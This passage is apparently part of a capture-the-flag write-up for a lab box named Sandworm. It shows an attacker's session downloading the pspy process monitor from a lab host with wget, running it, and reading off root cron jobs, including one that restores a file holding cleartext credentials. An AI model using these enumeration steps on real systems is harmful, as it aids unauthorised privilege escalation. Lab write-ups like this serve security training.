PSPY
A root crobjob process was found
silentobserver@sandworm:/dev/shm$ wget -q http://10.10.14.4/pspy64 ; chmod 755 ./pspy64Delivery complete
silentobserver@sandworm:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
1
The first process;
- goes to the
/opt/tipnet - echoes
e - builds and runs the program as the
atlasuser with the--offlineflag
1.2
This is the process of the program execution as the atlas user
2
The second process removes the /opt/crates directory recursively
3
This one calls for a bash script at /root/Clearnup/clean_c.sh
4
This process could be part of the 3rd process above, /root/Clearnup/clean_c.sh,
It basically restores the admin.json file, which contained the CLEARTEXT credential of the silentobserver user